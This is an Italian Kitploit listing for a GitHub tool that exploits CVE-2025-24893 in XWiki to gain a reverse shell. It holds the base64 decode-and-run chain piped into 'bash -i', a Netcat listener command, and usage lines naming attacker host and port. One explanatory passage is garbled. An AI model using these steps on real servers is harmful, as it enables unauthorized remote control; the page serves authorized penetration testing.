Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
xwiki-15.10.8-reverse-shell-cve-2025-24893 — CVE-2025-24893 exploit RCE per XWiki con capacità di reverse shell | Kitploit
Strumenti/GitHubGitHub/bishben/xwiki-15.10.8-reverse-shell-cve-2025-24893
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubbishben/xwiki-15.10.8-reverse-shell-cve-2025-24893

xwiki-15.10.8-reverse-shell-cve-2025-24893

CVE-2025-24893 exploit RCE per XWiki con capacità di reverse shell

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
361 anno faNon ancora revisionato
Condividi

CVE-2025-24893 Reverse Shell Exploit per XWiki

Disclaimer: Questo script è destinato esclusivamente a scopi educativi e test di sicurezza autorizzati. Non utilizzarlo su sistemi di cui non possiedi o di cui non hai esplicito permesso di testare. L'uso improprio può essere illegale e pericoloso.

Descrizione

Questo script Python sfrutta CVE-2025-24893, una vulnerabilità di Remote Code Execution che colpisce le versioni di XWiki fino alla 15.10.10.

  • Versione testata: XWiki 15.10.8
  • Impatto: Consente l'esecuzione di comandi arbitrari sul server di destinazione.
  • Versione Python: Scritto e testato in Python 3

Questa versione estende il PoC originale di Al Baradi Joy per generare una reverse shell. Il PoC originale può essere trovato qui.

Come funziona

  • XWiki esegue codice Groovy tramite il parametro URL.

  • L'exploit inietta un comando bash -c in questo template Groovy.

  • Una reverse shell normale contiene più apici (' e ) che potrebbero e l'URL.

"
rompere la valutazione di Groovy
  • Per risolvere questo, lo script codifica il comando shell in una singola riga in Base64.

  • Il payload viene quindi inviato nell'URL ed eseguito utilizzando la seguente catena:

    {echo,<base64>} | {base64,-d} | {bash,-i}

  • Questo decodifica il payload Base64 in modo sicuro e lo esegue con bash -i, fornendo una reverse shell interattiva.

  • Formato URL di destinazione

    • Formato: http://<target-host>
    • NON includere:
      • Una barra finale / alla fine
      • Il percorso /xwiki (lo script lo aggiunge automaticamente)

    Esempi:

    root@kitploit:~
    # Correct
    http://10.129.95.114:8080
    http://example.com:8080
    
    # Incorrect
    http://10.129.95.114:8080/         # trailing slash
    http://example.com/xwiki            # includes /xwiki
    

    Impostazione del listener

    Prima di eseguire l'exploit, devi avviare un listener sulla tua macchina per catturare la reverse shell.

    Esempio con Netcat:

    root@kitploit:~
    nc -lvnp <lport>
    
    • <lport> deve corrispondere alla porta che fornisci come argomento allo script.

    Utilizzo

    root@kitploit:~
    python3 cve-2025-24893.py <target_base_url> <lhost> <lport>
    

    Esempio:

    root@kitploit:~
    python3 cve-2025-24893.py http://10.129.95.114:8080 10.0.0.5 4444
    
    • Lo script stampa l'URL completo dell'exploit, il payload Base64 e le istruzioni per controllare il tuo listener.

    Riferimenti

    • GHSA Advisory
    • XWiki Homepage
    • PoC originale di Al Baradi Joy

    Crediti

    • Proof-of-Concept originale: Al Baradi Joy
    • Questa versione: Aggiornata per generare una reverse shell per l'esecuzione interattiva di comandi

    Avvertenza

    • Utilizza questo exploit solo in ambienti controllati (HTB, macchine di laboratorio, VM di tua proprietà).
    • L'uso non autorizzato su server pubblici è illegale e può comportare accuse penali.
    Scarica lo strumento